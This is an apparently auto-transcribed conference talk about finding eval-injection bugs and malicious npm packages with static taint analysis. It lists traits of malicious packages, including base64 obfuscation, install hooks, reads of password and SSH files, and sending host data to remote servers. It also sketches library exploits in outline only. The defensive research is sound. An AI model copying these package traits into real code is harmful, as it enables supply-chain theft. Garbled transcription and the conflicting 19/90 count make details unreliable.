 Hello guys, thank you for coming and today I will be sharing about how I found 19 NPM malicious package and first thing about me, my name is Kwan, I'm a final year's CEG student. My interest lies in computer security, IoT and guitar music as well. In the summer I interned with Veracode and this is the project that I have done with Veracode. There are actually two employees at the back who are from Veracode and yeah, they are hiring. Okay, so malicious package as you can see here, this is an NPM advisory, some of you might be familiar with it. So I found 19 malicious packages and I reported to them. So at the end of the talk, you might discover and you might want to discover and then have the name in the hall of fame in the NPM. So let's start. So the contents I will cover will be static analysis, what is that and train tracking, what is that. Then I move on about how I do my scan for eval function which is kind of a dangerous function in JavaScript and also my scan on malicious packages. So let's start with static analysis. Static analysis method of debugging based on only the code and static analysis can actually be used to detect bugs and vulnerabilities in the program. So an example of a static analysis program is ESLIN, yeah, very familiar. So ESLIN used static analysis to identify rules that you have already mentioned and if you think about it, ESLIN can be used to detect vulnerability as well because there are actually rules in ESLIN which cover security. This one of such example, this allow eval. So eval is a very dangerous function in JavaScript. It basically lets you execute a piece of code and in this example, it will execute object.x which will result in full. So ESLIN is able to detect this method alone but is it able to detect that this is a vulnerability? Well this is not a vulnerability because key is literal x so it's basically calling object.x. That's not a vulnerability but if this key is an user input then that might potentially lead to a vulnerability. So in order to find out whether or not key is a user input, we use 10 analysis. So there are two main concepts in 10 analysis. One is a source, another one is a sync. A source is basically where the data come in and a sync is where the data come out. So in this example, there are five lines, six lines and this is the example of a code that is vulnerable to cross-size scripting. That means you can inject this script and then you will be able to execute the script. So let's go through this example. So a is request.get parameter. It's basically try to retrieve the get parameter full and this is a sync because that is where, this is a source because that is where the attacker or the user can input his input in. So through a bunch of assignments, for example b equals to a, c equals to b, something, d equals to c and then e is equal to something d and then you move on to the sync. So the sync here basically just write down e in the browser or whatever is running this program. So that is a sync because that is where the program produce the output. So the 10 analysis try to evaluate if this e, this variable e is tainted by anything that can be input by the user. So the way that it does is that e is tainted by d because of this method and then it trace back d is tainted by c and so on and so forth and gets back to a. So the input of the user, which is a, would directly affect the output, which is e and that is how the cross-size scripting is enabled in this case. So there are many complications in 10 analysis. It's not as simple as just, you know, assigning and then whatever behind the assignment is what tains the variable. There might be multi-parameters in this case. There are multi-parameters in a big program. There might be different data structures that affect the 10 analysis. In this case is the hash map, which might affect the 10 analysis. And there are also a bunch of functions and objects and most importantly in security, we care about the sanitization methods. So is the input by the user sanitize anywhere between the sync and the source. Yeah. So that is basically what you need to know about static analysis and 10 analysis. And to do this, I use an algorithm for JavaScript to build a 10 analysis. It's called approximate call graph or you can call ACG. This algorithm has been reviewed by papers to have high precision and it's most importantly is very efficient. So I will explain how the algorithm works. So given a simple piece of code on the left, x equal to a plus b to the a of x, you have a representation on the right side, which is called ASD graph. And for static analysis, people usually use this graph to do the analysis on the source code. So the ACG, basically what it does is that it will traverse this graph and then while it's traversed this graph, it will be the tainted graph. So I will explain. So when it traversed down to this assignment, on the left, you have x on the right side, you have an arithmetic operations which include a and b. That means x is tainted by a or b and b. Also means a and b taints x. And after that, it travels up and then move on to the next statement and so on. And that is how the algorithm basically works. It's basically traversing the graph. And what I did to this algorithm is that I changed it up a bit so that it's more suitable for the application of finding security bugs. So security bugs, especially dangerous functions like evaluate does not frequently occur in the source code. So it will be inefficient if you scan all the libraries and then build the core graph or the tainted graph for every single library. You only want to build the tainted graph for the libraries that have dangerous function. And you only want to build the part of the graph that is related to that parameter, that variable alone. So instead of doing from top down, that means from the program and then traverse down the normal way, I will do it from the bottom up. That means I identify whether or not the dangerous function is there. And then from the dangerous function, I trace back to the top of the tree. So let me explain again. So it's the same piece of code. But now you know that the dangerous function is here, eva, and the variable is a. So what my algorithm do instead of going from program down, it will just trace from a here. So trace up to assignment operation. And then you know that a is tainted by a only. And that's all it's going to do. So basically it will only traverse this part of the graph instead of the whole program. Yes. So in the top view of what the algorithm do, it will first trace all the variables in the nodes. That means how to find this eva, and then trace whatever inside this eva function. It will try to trace back of what is the source of this a. How does it do that? By adding intra procedure edges, adding inter procedure edges, and then go back to tracing variables in the node. Basically it's a loop. And it will stop until all the notes that all the relevant notes are being inspected. I will explain what at intra procedures and inter procedure edges mean. So in intra procedures edges basically the operation that is only happening in that particular procedure yourself. So some of the example is this. So if you have an assignment like a equals to b, that means a is tainted by b or b tints a. And some of the other example includes a equals to b or c. That means b or c or tints a. So as I traverse the tree and then arrive at some node, I will inspect what kind of node that is. And then based on the type of node on these procedures, I will add the relevant edges to the tainted graph. And on the third column is a score. The score here is a score of confidence. That means if the score is zero, I have utmost confidence that the edge is the correct edge. And if the score is higher, then I have less confidence of that edge being correct. Right? So a good example is a equals to b or c. So in where in runtime environment, you will not know that a will take the value of b or c. So when you do static analysis, I would just assign a to be tainted by b and a to be tainted by c at the same time. So this is an overestimation because in runtime, it can be tainted by only one variable. And that's why I increase the score. And the purpose of the score is that I want to keep the analysis as precise as possible so that I can achieve a more efficient code. And so each procedure is quite simple to think about. What's more important, what's more complicated is the intra procedures edges. That means all the edges are added across the program. That means there must be some kind of function cost or something. So in the case of a equals to fb or new fb, that means a is equal to some function call with the parameter of b. There will be edges from a. That means the variable to b is the input to the functions. And similarly, a will be tainted by the return value of f. So you can kind of see this kind of more complicated because you have to draw an edge from the declaration of the function, which is stored somewhere in the code, and then the actual call of the function of a variable somewhere else in the code. Yeah. So these are the only operations that is needed in the algorithm. And after the algorithm is run, then what you have is a tainted tree. So using the same example, the tainted tree will be x tainted by a and b or a, b tends x, y is tainted by a, b is because of this. And then a tainted itself because of this. Okay. So the tainted tree is already obtained. And I would use this tainted tree to find the vulnerabilities. So I want to find all the vulnerabilities related to the eval functions. So using static analysis, I try to find all the occurrences of the eval call functions inside the code using this and identify what is the argument of this eval call function and find the 10 graph of this argument. Yeah. And this will be done in when I traverse the whole ASD tree of the program. After finding the 10 tree that I would take, I would use this 10 tree to apply the filters on it. That means is there anywhere in between the tree that there is a sanitization or is there anywhere inside the tree that one variable has a source of a parameter? I will explain this more. So sanitization filter, the purpose of this is to reduce the false positive of finding vulnerabilities. For example, in this case, we have the eval payload. And this payload is tainted by the variable request. And assume that the request comes from the user. So it's easy to see that this can be a vulnerability, because payload is tainted by the user input. However, in between, there is a function called remove blacklist, which can act as sanitization. That means the payload here will be safe to eval. And those are the cases that I want to find with sanitization filter. The way that I use to filter this is by heuristic. That means any method that contains some kind of keyword, like sanitize, blacklist, whitelist or replace, I just consider it as a sanitization method. Yeah. Source type filter. So in this example, the eval function is here, which is called an R0. And R0 is something that is literal and it's not input by the user. And in this case, I would say that it is not a vulnerability because, well, it's not input by the user. Yeah. So using these two types of filters and putting the tree as an input to these filters, I will able to scan all the results. And these are the results on a set of the top, I think top 1000 or something libraries in NPM that start with J. And the most important thing to take away here is that with no filters, that means with no 10 analysis of all, then there are about 180 libraries that are identified. But using the 10 analysis and all the filters, you can reduce it by three quarters. That means there's only over just over a few 45 libraries left. Yeah. And yeah, using this, I will able to find some exploitation for some of the libraries, which I will introduce here. Okay. So this library, what it simply does is that it converts the data to a table. So it provides a convenient method to just input the data in this field. And then you have a table in HTML. And one of the way that you can, so using the static analysis, I was able to find that there is a way to execute code in this data field. You just escape it without using this. And then you can basically execute any kind of code here. So here for demonstration purpose, I just alert something like malicious. Yeah. Another example is here. So this library, J2N, it converts a string to an object. So again, using static analysis, I was able to construct a payload that will execute this piece of code. So for demonstration purpose, I just num equals to 666 and then console. And then you can see in the execution, yeah, the console was executed. Yep. And that is for the scanning for eval dangerous methods. Next, I want to scan for malicious packages in NPM. And if you don't know, malicious package has been very popular this day. It's one of the easier way for the attackers to run codes in the user website or whatever the user used in the applications. An example is like this library, when it's installed, it will run executable targeting windows and upload information to a remote server. So I want to find all these packages on NPM. There's a pattern that I recognize with these packages. And I would use these patterns in my static analysis scan. So I will list five patterns here. These malicious packages are often obfuscated with Bay 64 so that the people who read the code cannot understand what it really does. It must be sending a request to a server or something because that is what the attackers really want to do. Sometimes it attempts to read sensitive files like a password file, SS shared file, and they usually run script in the post install and the pre-install field in the package.json. So the code that is written in this field, post install and pre-install, will automatically run in your environment when you install the NPM packages. And these packages are often typosquad as well. That means they have like an extra X or MongoDB without the correct... Yeah. So I did a scan using the same method, using the same static analysis, but without the 10 analysis because 10 analysis is not really effective here. And I found a bunch of libraries with this malicious code. And this malicious code basically send the information of the host name and whatever type of OS that the environment is running the program to a server online. And it's a Chinese server. So yeah. And these are the libraries. And I will go through the ways that these libraries execute the malicious code. So there are four ways. The first way is that they can require the file in the index.js. So when you require the library from another program, then that library will automatically execute the .test malicious code. Another way is to include the code inside the package.json and the fields to include them, the install field. Oops. Install. It's pretty small. But yeah, I just tell you the field is installed or post-installed or pre-installed. These will automatically run the malicious code. Yeah. And yeah. In conclusion, over the course of three months, I found 90 malicious packages and four libraries with a dangerous use of the eva function. And I think that any one of you can do the same thing. And I really think that the security in open source libraries is very important. And you know, for bug bounties programs, you usually need the skills of manual inspections. But for open source libraries, there's no way that you can inspect because there's too many open source libraries. So static code analysis is probably the best way to find the vulnerabilities and keep the open source library safe. Yes. And that's all. Yeah. If you have any questions about the project or about Veracode, you can ask the two guys. Can you raise your hands? Going here is manual, right? Or do you plan to make this? Well, the static analysis is not really manual. I mean, the manual part is to write the code. After the static analysis is run, it will produce kind of all the libraries that might potentially have the vulnerabilities. And then I will look at these libraries and then do a manual inspection because you can never trust it to the 100% that there will be a vulnerability there. Yeah. And most importantly, when you try to submit these things to any kind of advisory, you need to come up with an exploit. If there's no exploit, they are going to ignore your post. I guess what you mean for automation is like you have your github has, for example, a git secure or something which runs across different repositories. Oh, oh, yeah. Oops. Yeah. So there's actually API on NPM. So I use the infrastructure built by Veracode to scan through all the libraries automatically. But if you don't have that access, you can use the API from NPM and then retrieve the library names and then download it to somewhere in S3 or your computer, scan through a library, delete it, and then do that again. Yeah. I just looked through the most popular one. How would you tell that it is a whitelist or a whitelist? Well, I don't need to tell whether or not it's a whitelist or it's a blacklist method. How do you tell that it's a sanitization method? Yeah. So I use heuristic because there's no way that you can static scan a method and then know that the method is a sanitizing method. So I just base on the name of the method. Usually people would not use a user defined method to sanitize the output. They would usually use some kind of sanitization library from NPM to sanitize the input for them. Yeah. I think that you showed, right? How does it work? How would the graph for a recursive function look like? How does the graph for the recursive function look like? Hmm. So I cannot draw it here. But so when you traverse the tree, it just deficits and then you found something. And then while I was transfers the tree, I take note of all the locations that is related to the point down here. So when I found the variable here, I looked through all the references of that variable and then used the same method to walk up the tree till the point that I don't want to walk anymore. Yeah. I mean, if you want to know the details, you can ask me later. We all had to be compromised if you install a malicious package at stand 30, but it didn't import it. Wow. Because of typo and install a malicious package. But like we just use it. We all think we're compromised. But it depends on how the malicious package is designed. So if the malicious package have the malicious code inside the pre-install and post-install packages, then once you install like NPM install some package, then your environment is affected. Yeah. And the only way you can reverse is just to reinstall your whole environment. Yeah. But if the attackers is more kind, then you will just execute the malicious code when you call some kind of functions or when you require the library. By remaking your whole environment, do you mean like just NPR install or like you have to recompete the whole thing? Well, the attackers can basically because the NPM package manager, they have the rights of the user who is using that. So basically the attacker can install any backdoor anywhere in the computer. So yeah, with my environment, that means the whole machine. Yeah, unless you put it in SamOp, that's correct. So if you have like any more questions about details and stuff, you can approach me later. Yes. Thank you.